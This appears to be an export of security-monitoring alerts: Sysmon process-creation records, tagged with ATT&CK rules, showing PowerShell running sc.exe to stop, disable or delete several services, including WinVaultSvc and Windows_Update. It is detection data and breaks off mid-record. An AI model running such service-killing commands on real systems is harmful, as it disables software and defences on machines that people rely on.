+Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Xtfya Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:02.017230300Z"",""eventRecordID"":""3451"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:01.771\r\nProcessGuid: {df9fc3d3-b3f1-5ecf-0000-00103b672e00}\r\nProcessId: 6328\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:01.771"",""processGuid"":""{df9fc3d3-b3f1-5ecf-0000-00103b672e00}"",""processId"":""6328"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Xtfya Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.742",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:01.063 +ProcessGuid: {df9fc3d3-b3f1-5ecf-0000-001040632e00} +ProcessId: 8100 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:01.170390300Z"",""eventRecordID"":""3449"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:01.063\r\nProcessGuid: {df9fc3d3-b3f1-5ecf-0000-001040632e00}\r\nProcessId: 8100\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:01.063"",""processGuid"":""{df9fc3d3-b3f1-5ecf-0000-001040632e00}"",""processId"":""8100"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.679",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.732 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010bb5e2e00} +ProcessId: 336 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.737434900Z"",""eventRecordID"":""3446"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.732\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010bb5e2e00}\r\nProcessId: 336\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.732"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-0010bb5e2e00}"",""processId"":""336"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.594",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.612 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010625c2e00} +ProcessId: 5196 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.656651600Z"",""eventRecordID"":""3444"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.612\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010625c2e00}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.612"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-0010625c2e00}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.548",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.515 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-00102e5b2e00} +ProcessId: 7876 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.581890600Z"",""eventRecordID"":""3443"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.515\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-00102e5b2e00}\r\nProcessId: 7876\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.515"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-00102e5b2e00}"",""processId"":""7876"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.421",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.190 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010f1562e00} +ProcessId: 7896 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.196949600Z"",""eventRecordID"":""3440"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.190\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010f1562e00}\r\nProcessId: 7896\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.190"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-0010f1562e00}"",""processId"":""7896"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.124",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.093 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-001048532e00} +ProcessId: 5996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 